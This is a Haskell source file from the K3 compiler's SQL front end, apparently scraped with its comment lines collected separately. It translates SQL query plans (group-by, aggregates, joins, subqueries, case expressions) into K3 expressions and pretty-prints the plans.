cgchain Nothing (PlanCPath osid [] [] prjs [] Nothing []) = cglitselectlist [] osid prjs
cgchain Nothing _ = throwE "Invalid scalar chain component"
-- Group-by codegen: builds group/aggregate/zero lambdas for K3's group_by,
-- a field-path binding map for the key/value result, and an optional having filter.
cggroupby sid osid bm subqbs e gbs prjs aggs having = do
i <- uniqueScopeQualifier sid
o <- uniqueScopeQualifier osid
gbie <- (\f -> foldM f (0,[]) gbs >>= return . snd) $ \(i,acc) gbe -> do
gbke <- cgexpr subqbs Nothing sid gbe
case gbe of
(Identifier _ (Nmc n)) -> return (i, acc++[(n,gbke)])
_ -> return (i+1, acc++[("f" ++ show i, gbke)])
gbbodyE <- bindE sid bm (Just i) $ case gbie of
[] -> EC.unit
[(_,e)] -> e
_ -> recE gbie
let groupF = EC.lambda i gbbodyE
(prjsymidx, prjie) <- cgprojections subqbs 0 sid prjs
prjt <- mapM (scalarexprType $ Just sid) $ projectionexprs prjs
-- Projections must coincide with the group-by expressions.
unless (all (\((_,a), (_,b)) -> compareEAST a b) $ zip prjie gbie) $ throwE "Mismatched groupbys and projections"
(_, aggie, mergeie) <- cgaggregates subqbs prjsymidx sid aggs
aggbodyE <- bindE sid bm (Just i) $ case aggie of
[] -> EC.variable "acc"
[(_,e)] -> EC.applyMany e [EC.variable "acc"]
_ -> recE $ map (aggE "acc") aggie
let aggF = EC.lambda "acc" $ EC.lambda i $ aggbodyE
mergeF <- case mergeie of
[] -> return $ EC.lambda "_" $ EC.lambda "_" $ EC.unit
[(_,e)] -> return $ e
_ -> return $ EC.lambda "acc1" $ EC.lambda "acc2"
$ recE $ map (aggMergeE "acc1" "acc2") mergeie
aggt <- mapM (aggregateType $ Just sid) $ projectionexprs aggs
let aggit = zip (map fst aggie) aggt
zE <- zeroE aggit
let rE = EC.applyMany (EC.project "group_by" e) [groupF, aggF, zE]
-- Result fields live under "key"/"value" projections of group_by's output.
let prefixTypePath i pfx l = case l of
[] -> (i+1, [("f" ++ show i, [pfx])])
[j] -> (i, [(j, [pfx])])
_ -> (i, map (\j -> (j, [pfx, j])) l)
let (nidx, keyPaths) = prefixTypePath (0::Int) "key" $ map fst prjie
let (_, valPaths) = prefixTypePath nidx "value" $ map fst aggie
let rbm = BMTFieldMap $ Map.fromList $ keyPaths ++ valPaths
hve <- maybe (return Nothing) (havingE aggie osid rbm o) having
let hrE = maybe rE (\h -> EC.applyMany (EC.project "filter" rE) [EC.lambda o h]) hve
return $ Just (hrE, osid, rbm, Just mergeF)
-- Having predicates substitute already-computed aggregate fields for their exprs.
where havingE aggie osid rbm o e = do
let aggei = map (\(a,b) -> (b,a)) aggie
he <- cgexpr subqbs (Just $ subAgg aggei) osid e
hbodyE <- bindE osid rbm (Just o) $ he
return $ Just hbodyE
subAgg aggei e = do
case lookup e aggei of
Nothing -> return e
Just i -> return $ EC.variable i
-- Projections map; aggregates fold. The two are mutually exclusive here.
cgselectlist sid osid bm subqbs e prjs aggs = case (prjs, aggs) of
(p, []) -> do
i <- uniqueScopeQualifier sid
mbodyE <- cgprojections subqbs 0 sid prjs >>= \(_, fields) -> bindE sid bm (Just i) $ recE fields
let prjE = EC.applyMany (EC.project "map" e) [EC.lambda i mbodyE]
return $ Just (prjE, osid, bmelem, Nothing)
([], a) -> do
i <- uniqueScopeQualifier sid
(_, aggfields, mergeie) <- cgaggregates subqbs 0 sid aggs
aggbodyE <- bindE sid bm (Just i) $ case aggfields of
[] -> EC.variable "acc"
[(_,e)] -> EC.applyMany e [EC.variable "acc"]
_ -> recE $ map (aggE "acc") aggfields
let aggF = EC.lambda "acc" $ EC.lambda i $ aggbodyE
mergeF <- case mergeie of
[] -> return $ EC.lambda "_" $ EC.lambda "_" $ EC.unit
[(_,e)] -> return $ e
_ -> return $ EC.lambda "acc1" $ EC.lambda "acc2"
$ recE $ map (aggMergeE "acc1" "acc2") mergeie
rElemT <- scopeType osid >>= telemM
zE <- case tnc rElemT of
(TRecord ids, ch) -> zeroE $ zip ids ch
_ -> throwE "Invalid aggregate result type"
let rexpr = EC.applyMany (EC.project "fold" e) [aggF, zE]
return $ Just (rexpr, osid, BMNone, Just mergeF)
_ -> throwE $ "Invalid mutually exclusive projection-aggregate combination"
-- TODO: we should not pass subqbs down here, or state the assumption that subqbs is not used.
cglitselectlist subqbs sid prjs = cgprojections subqbs 0 sid prjs >>= \(_, ide) -> return $ Just (recE ide, sid, BMNone, Nothing)
cgprojections subqbs i sid l = foldM (cgprojection subqbs sid) (i, []) l
cgprojection subqbs sid (i, acc) si = do
(ni, n) <- selectItemId i si
cgaccprojection subqbs sid acc ni n $ projectionexpr si
cgaccprojection subqbs sid acc i n e = cgexpr subqbs Nothing sid e >>= \rE -> return (i, acc ++ [(n, rE)])
cgaggregates subqbs i sid l = foldM (cgaggregate subqbs sid) (i, [], []) l
cgaggregate subqbs sid (i, eacc, mrgacc) si = do
(ni, n) <- selectItemId i si
cgaccaggregate subqbs sid eacc mrgacc ni n si
cgaccaggregate subqbs sid eacc mrgacc i n si =
cgaggexpr subqbs sid si >>= \(rE, mergeE) -> return (i, eacc ++ [(n, rE)], mrgacc ++ [(n, mergeE)])
cgconjunct subqbs sid eacc e = cgexpr subqbs Nothing sid e >>= \e' -> return $ EC.binop OAnd eacc e'
-- Aggregate codegen: per-element accumulation lambda plus a two-accumulator merge.
cgaggexpr subqbs sid si = do
(e, aggFn) <- aggregateexpr si
aE <- cgexpr subqbs Nothing sid e
return $ case aggFn of
AggSum -> (binagg OAdd aE, mergeagg OAdd)
AggCount -> (binagg OAdd $ EC.constant $ CInt 1, mergeagg OAdd)
AggMin -> (binapp "min" aE, mergeapp "min")
AggMax -> (binapp "max" aE, mergeapp "max")
where binagg op e = EC.lambda "aggacc" $ EC.binop op (EC.variable "aggacc") e
binapp f e = EC.lambda "aggacc" $ EC.applyMany (EC.variable f) [EC.variable "aggacc", e]
mergeagg op = EC.lambda "a" $ EC.lambda "b" $ EC.binop op (EC.variable "a") $ EC.variable "b"
mergeapp f = EC.lambda "a" $ EC.lambda "b" $ EC.applyMany (EC.variable f) [EC.variable "a", EC.variable "b"]
-- TODO: case, correlated subqueries, more type constructors
-- TODO: Cast, Interval, LiftOperator, NullLit, Placeholder, PositionalArg, WindowFn
cgexpr _ _ _ (BooleanLit _ b) = return $ EC.constant $ CBool b
cgexpr _ _ _ (NumberLit _ i) = return $ if "." `isInfixOf` i
then EC.constant $ CReal $ read i
else EC.constant $ CInt $ read i
cgexpr _ _ _ (StringLit _ s) = return $ EC.constant $ CString s
cgexpr _ _ _ (TypedStringLit _ tn s) = do
t <- sqlnamedtype tn
case (tag t, find isTProperty $ annotations t) of
(TInt, Just (TProperty (tPropertyName -> "TPCHDate"))) -> return $ EC.constant $ CInt $ read $ filter (/= '-') s
(_, _) -> throwE $ boxToString $ ["Unsupported constructor for"] %$ prettyLines t
cgexpr _ _ _ (Identifier _ (sqlnmcomponent -> i)) = return $ EC.variable i
cgexpr _ _ sid (QIdentifier _ nmcl) = do
ptr <- sqcflkupM sid $ sqlnmpath nmcl
EC.variable . adnn <$> sqglkupM ptr
cgexpr subqbs f sid (Case _ whens elseexpr) = cgcase subqbs f sid elseexpr whens
cgexpr subqbs f sid (CaseSimple _ expr whens elseexpr) = cgcasesimple subqbs f sid expr elseexpr whens
cgexpr subqbs f sid e@(FunCall _ nm args) = do
isAgg <- isAggregate e
if isAgg then do
(agge,_) <- cgaggexpr subqbs sid (SelExp emptyAnnotation e)
maybe err ($ agge) f
else do
let fn = sqlnm nm
case sqloperator fn args of
(Just (UnaryOp o x)) -> EC.unop o <$> cgexpr subqbs f sid x
(Just (BinaryOp o x y)) -> EC.binop o <$> cgexpr subqbs f sid x <*> cgexpr subqbs f sid y
_ -> do
case (fn, args) of
("!between", [x,y,z]) ->
let cg a b c = EC.binop OAnd (EC.binop OLeq b a) $ EC.binop OLeq a c
in cg <$> cgexpr subqbs f sid x <*> cgexpr subqbs f sid y <*> cgexpr subqbs f sid z
-- TODO
("!like", [_,_]) -> throwE $ "LIKE operator not yet implemented"
("!notlike", [_,_]) -> throwE $ "NOTLIKE operator not yet implemented"
(_, _) -> EC.applyMany (EC.variable fn) <$> mapM (cgexpr subqbs f sid) args
where err = throwE "Invalid aggregate expression in cgexpr"
cgexpr _ _ sid (Star _) = do
(_, ord, _) <- sqclkupM sid >>= unqualifiedScopeFrame
recE <$> mapM (\p -> singletonPath p >>= \j -> return (j, EC.variable j)) ord
cgexpr _ _ sid (QStar _ (sqlnmcomponent -> i)) = do
qattrs <- sqclkupM sid >>= qualifiedAttrs [i] >>= attrIds
recE <$> mapM (\j -> return (j, EC.variable j)) qattrs
cgexpr subqbs _ _ e@(Exists _ _) = do
(subexpr, _, _) <- cgsubquery subqbs e
emptyE False subexpr
cgexpr subqbs _ _ e@(ScalarSubQuery _ _) = cgsubquery subqbs e >>= \(r,_,_) -> return r
-- IN over a literal list: memoize the test value and chain (in)equality tests.
cgexpr subqbs f sid (InPredicate _ ine isIn (InList _ el)) = do
testexpr <- cgexpr subqbs f sid ine
valexprs <- mapM (cgexpr subqbs f sid) el
case valexprs of
[] -> return $ EC.constant $ CBool $ not isIn
(h:t) -> memoE (immutE $ testexpr) $
\vare -> return $ foldl (\accE vale -> mergeE accE $ testE vare vale) (testE vare h) t
where testE vare vale = EC.binop (if isIn then OEqu else ONeq) vare vale
mergeE acce nexte = EC.binop (if isIn then OOr else OAnd) acce nexte
cgexpr subqbs f sid e@(InPredicate _ ine isIn (InQueryExpr _ _)) = do
testexpr <- cgexpr subqbs f sid ine
(subexpr, osid, bm) <- cgsubquery subqbs e
memberE isIn osid bm testexpr subexpr
cgexpr _ _ _ e = throwE $ "Unhandled expression in codegen: " ++ show e
-- Case-statement generation.
cgcase _ _ _ _ [] = throwE $ "Invalid empty case-list in cgcase"
cgcase subqbs f sid elseexpr whens@((_,e):_) = do
elseE <- maybe (zeroSQLE (Just sid) e) (cgexpr subqbs f sid) elseexpr
foldM (cgcasebranch subqbs f sid) elseE whens
cgcasesimple _ _ _ _ _ [] = throwE $ "Invalid empty case-list in cgcasesimple"
cgcasesimple subqbs f sid expr elseexpr whens@((_, e):_) = do
valE <- cgexpr subqbs f sid expr
elseE <- maybe (zeroSQLE (Just sid) e) (cgexpr subqbs f sid) elseexpr
foldM (cgcasebrancheq subqbs f sid valE) elseE whens
cgcasebranch subqbs f sid elseE (l,e) = do
predE <- case l of
[] -> throwE "Invalid case-branch-list"
[x] -> cgexpr subqbs Nothing sid x
h:t -> cgexpr subqbs Nothing sid h >>= \hE -> foldM (cgconjunct subqbs sid) hE t
thenE <- cgexpr subqbs f sid e
return $ EC.ifThenElse predE thenE elseE
cgcasebrancheq subqbs f sid valE elseE (l,e) = do
testValE <- case l of
[x] -> cgexpr subqbs Nothing sid x
_ -> throwE "Invalid case-branch-eq-list"
thenE <- cgexpr subqbs f sid e
return $ EC.ifThenElse (EC.binop OEqu valE testValE) thenE elseE
-- Subqueries
cgsubquery subqbs e =
case lookup e subqbs of
Nothing -> throwE $ "Found a subquery without a binding: " ++ show e
Just (_, qcl) -> cgclosure qcl >>= \(r, osid, bm, _) -> return (r, osid, bm)
-- Combine the two join sides' binding maps into a single partitioned map.
bindingMap l = foldM qualifyBindings (BMTVPartition Map.empty) l
qualifyBindings (BMTVPartition acc) (qual, Just aenv, bm) = do
f <- case bm of
BMNone -> return $ commonNoneBinding qual
BMTPrefix i -> return $ commonPrefixBinding qual i
BMTFieldMap fb -> return $ commonFieldBinding qual fb
_ -> throwE "Cannot qualify partitioned bindings"
return $ BMTVPartition $ Map.foldlWithKey f acc aenv
qualifyBindings _ _ = throwE "Cannot qualify partitioned bindings"
commonNoneBinding qual acc path _ = case path of
[i] -> Map.insert i (qual, Nothing) acc
_ -> acc
commonPrefixBinding qual pfx acc path _ = case path of
[i] -> Map.insert i (qual, Just $ Left pfx) acc
_ -> acc
commonFieldBinding qual fb acc path _ = case path of
[i] -> maybe acc (\typePath -> Map.insert i (qual, Just $ Right typePath) acc) $ Map.lookup i fb
_ -> acc
-- Wrap the running expression in a filter over one selection predicate.
filterChainE :: ScopeId -> BindingMap -> SubqueryBindings -> K3 Expression -> ScalarExpr -> SQLParseM (K3 Expression)
filterChainE sid bm subqbs eacc e = do
i <- uniqueScopeQualifier sid
filterE <- cgexpr subqbs Nothing sid e
bodyE <- bindE sid bm (Just i) filterE
return $ EC.applyMany (EC.project "filter" eacc) [EC.lambda i bodyE]
-- Distributed mode: annotate stage triggers with the matching distributed
-- pattern (hash/broadcast join, distributed group-by). Single-node mode adds
-- a count barrier for stages with multiple inputs.
annotateTriggerBody i (QueryPlan tOpt chains _) mergeOpt e = do
if distributed
then case tOpt of
Just (isEquiJoin -> True) ->
return $ e @+ (EApplyGen True "DistributedHashJoin2" $ Map.fromList [("lbl", SLabel i)])
Just (isJoin -> True) ->
return $ e @+ (EApplyGen True "BroadcastJoin2" $ Map.fromList [("lbl", SLabel i)])
Just (treeChains -> Just chains) | not (null chains) && isGroupByAggregatePath (last chains) ->
case mergeOpt of
Just mergeF -> return $ e @+ (EApplyGen True "DistributedGroupBy2"
$ Map.fromList [("lbl", SLabel i), ("merge", SExpr mergeF)])
Nothing -> throwE "No merge function found for group-by stage"
_ -> return e
else maybe (return e) (const $ joinBarrier e) $ Map.lookup i stagechildren
joinBarrier e = mkCountBarrier e $ EC.constant $ CInt 2
mkCountBarrier e countE = do
args <- barrierArgs countE
return $ e @+ EApplyGen True "OnCounter" args
barrierArgs countE = do
lblsym <- slblsextM
return $ Map.fromList [ ("id", SLabel $ "barrier" ++ show lblsym)
, ("eq", SExpr $ countE)
, ("reset", SExpr $ EC.constant $ CBool False)
, ("profile", SExpr $ EC.constant $ CBool False) ]
master = DC.global "master" (immutT TC.address) Nothing
-- Loader declarations for a base relation: an external loader function over
-- a collection of file paths, plus the path collection itself.
mkLoader (i,t) = do
dt <- twrapcolelemM t
let pathCT = (TC.collection $ recT [("path", TC.string)]) @+ TAnnotation "Collection"
let rexpr = EC.applyMany (EC.variable $ i ++ "LoaderE") [EC.variable $ i ++ "Files", EC.variable i]
return $
([(DC.global (i ++ "LoaderE") (immutT $ TC.function pathCT $ TC.function dt TC.unit) Nothing) @+ cArgsProp 2,
DC.global (i ++ "Files") (immutT pathCT) Nothing],
rexpr)
-- Every peer runs its loaders, then signals start (to the master when distributed).
mkPeerInit exprs =
[DC.trigger "startPeer" TC.unit $ EC.lambda "_" $
EC.block $ exprs ++ [EC.send (EC.variable "start") (EC.variable $ if distributed then "master" else "me") EC.unit]]
-- The start trigger kicks off the initial stages once all peers are ready.
mkInit decls = do
sendsE <- if distributed then
let startE = EC.block $ flip map stageinits $ \i ->
EC.applyMany (EC.project "iterate" $ EC.variable "peers")
[EC.lambda "p" $ EC.send (EC.variable $ trig i) (EC.project "addr" $ EC.variable "p") EC.unit]
in mkCountBarrier startE $ EC.applyMany (EC.project "size" $ EC.variable "peers") [EC.unit]
else return $ EC.block $ map (\i -> EC.send (EC.variable i) (EC.variable "me") EC.unit) $ foldl declTriggers [] decls
return $ [DC.trigger "start" TC.unit $ EC.lambda "_" $
EC.block $ [EC.unit @+ EApplyGen True "SQL" Map.empty, sendsE]]
declTriggers acc (tag -> DTrigger i _ _) = acc ++ [i]
declTriggers acc _ = acc
-- | Render each SQL declaration as a human-readable, pretty-printed string.
sqlstringify :: [SQLDecl] -> SQLParseM [String]
sqlstringify = mapM (return . render)
  where
    -- One pretty-printed box per declaration kind.
    render decl = case decl of
      SQLRel   (n, ty) -> boxToString $ [unwords ["Table:", n]] %$ prettyLines ty
      SQLStage (n, ty) -> boxToString $ [unwords ["Stage:", n]] %$ prettyLines ty
      SQLQuery plan    -> boxToString $ ["Plan: "] %$ prettyLines plan
-- | Render the attribute dependency graph reachable from each query's final
--   output scope. Relations and stages contribute nothing.
sqldepgraph :: [SQLDecl] -> SQLParseM [String]
sqldepgraph stmts = mapM depgraph stmts >>= return . concat
where depgraph (SQLRel _) = return []
depgraph (SQLStage _) = return []
depgraph (SQLQuery (QueryPlan Nothing [] _)) = return []
depgraph (SQLQuery (QueryPlan Nothing chains _)) = chaseScope $ pcoutsid $ last chains
depgraph (SQLQuery (QueryPlan (Just t) chains _)) = treeSchema t >>= \sid -> chaseScope $ chainSchema sid chains
-- Chase every attribute pointer bound in the scope and print the visited nodes.
chaseScope sid = do
sf <- sqclkupM sid
ptrs <- sqcfptrsM sid
nodes <- mapM (adgchaseNodesM []) ptrs >>= return . nub . concat
return $ [unwords ["Scope", show sid, show sf, show ptrs]] ++ (indent 2 $ adgnodes nodes)
-- One line per node: pointer, name, source relation, child pointers.
adgnodes nodes = map (\(p,node) -> unwords [show p, show $ adnn node, show $ adnr node, show $ adnch node])
$ sortBy (compare `on` fst) nodes
{- Code generation helpers. -}
-- | Apply a chain of field projections to an expression, left to right.
projectPathE :: K3 Expression -> [Identifier] -> K3 Expression
projectPathE = foldl (flip EC.project)
-- | Dereference a field of an expression according to a type mapping:
--   no mapping uses the expression directly, a prefix interposes one
--   projection, and a path projects along the full type path.
fieldE :: TypeMapping -> Identifier -> K3 Expression -> K3 Expression
fieldE tm i e = case tm of
  Nothing         -> e
  Just (Left pfx) -> EC.project i (EC.project pfx e)
  Just (Right tp) -> projectPathE e tp
-- | Build a record expression whose fields are projected out of the variable
--   @i@, following the per-field type paths in @fb@. Fails on a missing binding.
namedRecordE :: Identifier -> Map Identifier TypePath -> [Identifier] -> SQLParseM (K3 Expression)
namedRecordE i fb ids = recE <$> mapM field ids
  where field j = case Map.lookup j fb of
          Just tp -> return (j, projectPathE (EC.variable i) tp)
          Nothing -> throwE $ "No field binding found in namedRecordE for " ++ show j
-- | Build a record expression where each field may originate from a different
--   source variable, as described by the partition binding @pb@.
compositeRecordE :: Map Identifier (Identifier, TypeMapping) -> [Identifier] -> SQLParseM (K3 Expression)
compositeRecordE pb ids = recE <$> mapM field ids
  where field i = case Map.lookup i pb of
          Just (v, tm) -> return (i, fieldE tm i $ EC.variable v)
          Nothing      -> throwE $ "No field binding found in compositeRecordE for " ++ show i
-- | Wrap an expression in a bind-as that brings a scope's unqualified
--   attributes into K3 scope, reconstructing the bound record according to
--   the binding map. The identifier names the value being destructured.
bindE :: ScopeId -> BindingMap -> Maybe Identifier -> K3 Expression -> SQLParseM (K3 Expression)
bindE sid bm iOpt e = do
ids <- sqclkupM sid >>= unqualifiedAttrs
case (iOpt, bm) of
-- Direct record: bind the variable's fields one-to-one.
(Just i, BMNone) -> return $ EC.bindAs (EC.variable i) (BRecord $ zip ids ids) e
-- Fields live under a common prefix projection.
(Just i, BMTPrefix j) -> return $ EC.bindAs (EC.project j $ EC.variable i) (BRecord $ zip ids ids) e
-- Fields are reached via per-field type paths.
(Just i, BMTFieldMap fb) -> do
initE <- namedRecordE i fb ids
return $ EC.bindAs initE (BRecord $ zip ids ids) e
-- Partitioned bindings draw fields from several source variables.
(_, BMTVPartition pb) -> do
initE <- compositeRecordE pb ids
return $ EC.bindAs initE (BRecord $ zip ids ids) e
_ -> throwE "Invalid binding variable in bindE"
-- | Construct the record expression for a scope's unqualified attributes,
--   without a surrounding bind; the counterpart of 'bindE' for output records.
concatE :: ScopeId -> BindingMap -> Maybe Identifier -> SQLParseM (K3 Expression)
concatE sid bm iOpt = do
ids <- sqclkupM sid >>= unqualifiedAttrs
case (iOpt, bm) of
(Just i, BMNone) -> return $ EC.variable i
(Just i, BMTPrefix j) -> return $ EC.project j $ EC.variable i
(Just i, BMTFieldMap fb) -> namedRecordE i fb ids
(_, BMTVPartition pb) -> compositeRecordE pb ids
_ -> throwE "Invalid binding variable in concatE"
-- | Apply a per-field aggregate function to the matching field of the
--   accumulator record named by the first argument.
aggE :: Identifier -> (Identifier, K3 Expression) -> (Identifier, K3 Expression)
aggE acc (field, fn) = (field, EC.applyMany fn [EC.project field $ EC.variable acc])
-- | Merge the same field of two accumulator records using the field's merge function.
aggMergeE :: Identifier -> Identifier -> (Identifier, K3 Expression) -> (Identifier, K3 Expression)
aggMergeE lacc racc (field, mergeF) = (field, EC.applyMany mergeF [fieldOf lacc, fieldOf racc])
  where fieldOf v = EC.project field $ EC.variable v
-- | Default (zero) expression for a list of named types: unit when empty,
--   the single field's default for a singleton, otherwise a record default.
zeroE :: [(Identifier, K3 Type)] -> SQLParseM (K3 Expression)
zeroE fields = case fields of
  []       -> return EC.unit
  [(_, t)] -> either throwE return $ defaultExpression t
  _        -> either throwE return $ defaultExpression $ recT fields
-- | Type-level analogue of the zero expression: unit when empty, the single
--   field's type for a singleton, otherwise a record type.
zeroT :: [(Identifier, K3 Type)] -> SQLParseM (K3 Type)
zeroT fields = return $ case fields of
  []       -> TC.unit
  [(_, t)] -> t
  _        -> recT fields
-- | Default expression for a SQL scalar expression, derived from its inferred K3 type.
zeroSQLE :: Maybe ScopeId -> ScalarExpr -> SQLParseM (K3 Expression)
zeroSQLE sidOpt e = do
  t <- scalarexprType sidOpt e
  either throwE return $ defaultExpression t
-- TODO:
-- | Locally memoize an expression: constants and variables are passed to the
--   body directly, anything else is bound once to "__memo" and the body sees
--   a reference to that binding.
memoE :: K3 Expression -> (K3 Expression -> SQLParseM (K3 Expression)) -> SQLParseM (K3 Expression)
memoE srcE bodyF
  | cheap (tag srcE) = bodyF srcE
  | otherwise = EC.letIn "__memo" (immutE srcE) <$> bodyF (EC.variable "__memo")
  where cheap (EConstant _) = True
        cheap (EVariable _) = True
        cheap _             = False
-- | Build a filter over a collection retaining elements equal to the given
--   element expression. The element expression is memoized before comparison,
--   and only single-attribute scopes are supported as match targets.
matchE :: ScopeId -> BindingMap -> K3 Expression -> K3 Expression -> SQLParseM (K3 Expression)
matchE sid bm elemexpr colexpr = do
ids <- sqclkupM sid >>= unqualifiedAttrs
targetE <- matchTargetE ids
memoE (immutE elemexpr) $ \e -> do
bodyE <- bindE sid bm (Just "__x") $ EC.binop OEqu targetE e
return $ EC.applyMany (EC.project "filter" $ colexpr) [EC.lambda "__x" bodyE]
where matchTargetE [x] = return $ EC.variable x
matchTargetE l = throwE $ "Invalid match targets: " ++ show l
-- | Membership (or, when the flag is False, non-membership) test of an element
--   against a collection: filter for matches, then check (non-)emptiness.
memberE :: Bool -> ScopeId -> BindingMap -> K3 Expression -> K3 Expression -> SQLParseM (K3 Expression)
memberE asMem sid bm elemexpr colexpr = do
  matches <- matchE sid bm elemexpr colexpr
  emptyE (not asMem) matches
-- | Size-based (non-)emptiness predicate over a collection expression.
emptyE :: Bool -> K3 Expression -> SQLParseM (K3 Expression)
emptyE asEmpty colexpr = return $ EC.binop cmpOp sizeE zeroLit
  where cmpOp   = if asEmpty then OEqu else ONeq
        sizeE   = EC.applyMany (EC.project "size" colexpr) [EC.unit]
        zeroLit = EC.constant $ CInt 0
-- | Property construction helper
-- | Property construction helper: annotate a declaration with the number of
--   constructor arguments ("CArgs") it expects.
cArgsProp :: Int -> Annotation Declaration
cArgsProp numArgs = DProperty (Left ("CArgs", Just (LC.int numArgs)))
{- Query plan pretty printing. -}
-- | Pretty-print a list of items as a drawn subtree, using "+- " branch and
--   "`- " terminal prefixes in the style of 'drawSubTrees'.
prettyList :: (Pretty a) => [a] -> [String]
prettyList [] = []
prettyList [x] = "|" : (shift "`- " " " $ prettyLines x)
prettyList l = "|" : (concatMap (\x -> shift "+- " "| " $ prettyLines x) (init l)
++ ["|"] ++ (shift "`- " " " $ prettyLines $ last l))
-- | Draws a plan node header, its chain components, and its subtrees.
instance Pretty (Tree PlanNode) where
prettyLines (Node (PJoin psid osid jt jeq jp _ chains) ch) =
[unwords ["Join", show psid, show osid, show jt, "equalities", show $ length jeq, "preds", show $ length jp]]
++ prettyList chains ++ drawSubTrees ch
prettyLines (Node (PTable n sid _ _ chains) _) =
[unwords ["Table", n, show sid]] ++ prettyList chains
prettyLines (Node (PSubquery _ qcl) _) = ["Subquery", "|"] ++ (shift "`- " " " $ prettyLines qcl)
-- | A closure prints as a header over its contained plan.
instance Pretty QueryClosure where
prettyLines (QueryClosure _ plan) = ["QueryClosure", "|"] ++ (shift "`- " " " $ prettyLines plan)
-- | A plan prints its stage id (when present), join tree, and chain components.
instance Pretty QueryPlan where
prettyLines (QueryPlan treeOpt chains stgOpt) =
["QueryPlan " ++ maybe "" id stgOpt] ++ (maybe [] treeF treeOpt) ++ prettyList chains
where treeF t = if null chains then "|" : (shift "`- " " " $ prettyLines t)
else "|" : (shift "+- " "| " $ prettyLines t)
-- | A chain component prints a one-line summary of its clause counts.
instance Pretty PlanCPath where
prettyLines (PlanCPath sid selects gbs prjs aggs having _) =
[unwords ["PlanCPath", show sid
, "sels", show $ length selects
, "gbys", show $ length gbs
, "prjs", show $ length prjs
, "aggs", show $ length aggs
, maybe "<no having>" (const "having") having]]
| null | https://raw.githubusercontent.com/DaMSL/K3/51749157844e76ae79dba619116fc5ad9d685643/src/Language/K3/Parser/SQL.hs | haskell | # LANGUAGE DoAndIfThenElse #
TODO:
x. more groupByPushdown, subquery and distributed plan testing
| Relation names and types.
| Attribute dependency graph.
| Scope frames are mappings of name paths (qualified or unqualified) to attributes.
| Scope environments store bindings throughout a query's subexpressions.
| Internal query plan representation.
| Binding mappings
| Parsing state environment.
| A stateful SQL parsing monad.
| SQL program statements
Naming helpers.
Type and alias helpers.
| Wraps a collection's element type with an 'elem' label
SQLParseM helpers.
SQLEnv helpers
| Relation type accessors
| Dependency graph accessors.
| Scope environment accessors.
| Symbol generation.
| State accessors.
Scope construction
| Extend the attribute graph for a relation type computed from the given expressions.
Relation type and name construction.
TODO: timestamp, interval, size limits for numbers
SQL AST helpers.
Scope accessors.
Binding map helpers.
Query plan accessors.
Path/chain accessors.
TODO:
i. builtin function types
TODO: return subquery type, not bool!
Rewriting helpers.
TODO: case, etc.
This function does not descend into subqueries.
However, it should include free variables present in the subquery, and defined in
the given scope.
| Returns pointers bound in a scope frame.
| Chases a given attribute pointer to the provided roots (or its set of source nodes if
no roots are given).
| Returns a set of nodes visited during a chase on a given list of roots and a starting pointer.
Optimization
TODO: query decorrelation
TODO: distinct, order, limit, offset
TODO: simplify chains with join tree before adding to top-level plan.
TODO: case, correlated subqueries, more type constructors
Case-statement generation.
Subqueries
Code generation helpers.
| Property construction helper
Query plan pretty printing. | # LANGUAGE LambdaCase #
# LANGUAGE PatternSynonyms #
# LANGUAGE TupleSections #
# LANGUAGE ViewPatterns #
3 . chain simplification
5 . expression case completion
6 . pushdown in subqueries
7 . subqueries in gbs , prjs , aggs
8 . correlated subqueries , and query decorrelation
module Language.K3.Parser.SQL where
import Control.Arrow ( (***), (&&&), first, second )
import Control.Monad
import Control.Monad.State
import Control.Monad.Trans.Except
import Data.Function ( on )
import Data.Functor.Identity
import Data.Maybe ( catMaybes )
import Data.Either ( partitionEithers )
import Data.Monoid
import Data.List ( (\\), find, intersect, nub, isInfixOf, isPrefixOf, sortBy, unzip4 )
import Data.Map ( Map )
import Data.Set ( Set )
import Data.Tree
import qualified Data.Map as Map
import qualified Data.Set as Set
import Debug.Trace
import Database.HsSqlPpp.Ast
import Database.HsSqlPpp.Annotation hiding ( Annotation )
import qualified Database.HsSqlPpp.Annotation as HA ( Annotation )
import Database.HsSqlPpp.Parser
import Database.HsSqlPpp.Pretty
import Language.K3.Core.Annotation
import Language.K3.Core.Common
import Language.K3.Core.Declaration
import Language.K3.Core.Expression
import Language.K3.Core.Type
import Language.K3.Core.Literal
import Language.K3.Core.Metaprogram
import Language.K3.Core.Utils
import qualified Language.K3.Core.Constructor.Declaration as DC
import qualified Language.K3.Core.Constructor.Expression as EC
import qualified Language.K3.Core.Constructor.Literal as LC
import qualified Language.K3.Core.Constructor.Type as TC
import Language.K3.Utils.Pretty
import Language.K3.Utils.Pretty.Syntax
-- | A SQL operator application lifted onto a K3 operator, carrying the
--   (still unparsed) SQL argument expressions.
data OperatorFn = UnaryOp Operator ScalarExpr
                | BinaryOp Operator ScalarExpr ScalarExpr
                deriving (Eq, Show)
-- | The SQL aggregate functions supported by this translator.
data AggregateFn = AggSum
                 | AggCount
                 | AggMin
                 | AggMax
                 deriving (Eq, Read, Show)
-- | Environment mapping relation names to their K3 collection types.
type RTypeEnv = Map Identifier (K3 Type)

-- | Pointer (key) into the attribute dependency graph.
type ADGPtr = Int

-- | Attribute dependency graph node: attribute name and type, an optional
--   source relation, an optional defining expression, and pointers to the
--   attributes the definition depends on.
data ADGNode = ADGNode { adnn :: Identifier
                       , adnt :: K3 Type
                       , adnr :: Maybe Identifier
                       , adne :: Maybe ScalarExpr
                       , adnch :: [ADGPtr] }
             deriving (Eq, Show)

-- | The attribute dependency graph, keyed by pointer.
type ADGraph = Map ADGPtr ADGNode

-- | A possibly qualified attribute reference, e.g. ["t","a"] or ["a"].
type AttrPath = [Identifier]

-- | Relation qualifiers visible in a scope.
type Qualifiers = [[Identifier]]

-- | Maps attribute paths to their defining graph node.
type AttrEnv = Map AttrPath ADGPtr

-- | A scope frame: attribute bindings, attribute ordering, and qualifiers.
type ScopeFrame = (AttrEnv, [AttrPath], Qualifiers)

-- | Identifier for a scope frame in the scope environment.
type ScopeId = Int

-- | All scope frames produced during parsing, keyed by scope id.
type ScopeEnv = Map ScopeId ScopeFrame

-- | A query plan paired with its free attribute references
--   (correlated variables for subqueries).
data QueryClosure = QueryClosure { qcfree :: [AttrPath]
                                 , qcplan :: QueryPlan }
                  deriving (Eq, Show)

-- | Subquery expressions bound to a generated identifier and their closure.
type SubqueryBindings = [(ScalarExpr, (Identifier, QueryClosure))]

-- | One select/group-by/project/aggregate stage in a plan chain, together
--   with its output scope and any subquery bindings it references.
data PlanCPath = PlanCPath { pcoutsid :: ScopeId
                           , pcselects :: ScalarExprList
